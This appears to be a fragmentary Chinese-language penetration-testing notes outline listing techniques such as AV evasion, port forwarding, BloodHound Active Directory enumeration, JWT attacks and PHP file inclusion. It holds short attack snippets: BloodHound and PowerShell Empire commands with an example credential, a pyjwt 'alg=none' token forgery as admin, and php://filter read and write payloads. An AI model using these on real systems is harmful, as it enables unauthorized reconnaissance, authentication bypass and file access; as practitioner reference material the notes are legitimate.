• 免杀

  • 在线编译器

  • tmux

  • netsh实现端口转发

  • ssh端口转发

  • BloodHound

    • 安装运行服务

      • apt install bloodhound

neo4j console

    • 启动BloodHound GUI

      • bloodhound

    • 安装数据采集器

      • pip3 install bloodhound

    • 从域中提取数据

      • bloodhound-python -u administer -p Ignite@987 -ns 192.168.1.172 -d ignite.local -c All

    • 导入数据

    • 分析

    • 用BloodHound进行列举

    • BloodHound on Windows

      • sharphound.exe
dir

      • Download Neo4j Windows
dir
neo4j.bat console

    • Download BloodHound GUI Windows

      • dir
BloodHound.exe

    • SharpHound on PowerShell

    • SharpHound on PowerShell Empire

      • usemodule situtationa_awareness/network/bloodhound
execute
---
ls
download group_memberships.csv
download local_admins.csv
download trusts.csv
download user_sessions.csv

  • Windows Privilege Escalation: SeBackupPrivilege

  • Responder

  • 一种后渗透阶段权限维持方法

  • 渗透测试常见问题以及方法

  • 内网渗透-代理篇

  • url-extractor

  • JWT攻击手法

    • https://jwt.io/#debugger-io

未校验签名
将原JWT串解码后修改用户名等身份认证的地方,生成新token发送请求

禁用哈希
Alg代表加密方式,修改用户名等身份认证的地方,把HS256设置为none生成token发送请求,使用python的pyjwt模块
import jwt
jwt.encode({'user':'admin','arg1':'value1','arg2':'value2'},algorithm='none',key='')

  • php文件包含

    • 读取
/1.php?file=php://filter/read=convert.base64-encode/resource=./1.php
写入
/1.php?file=php://filter/write=convert.base64-decode/resource=[file]","base64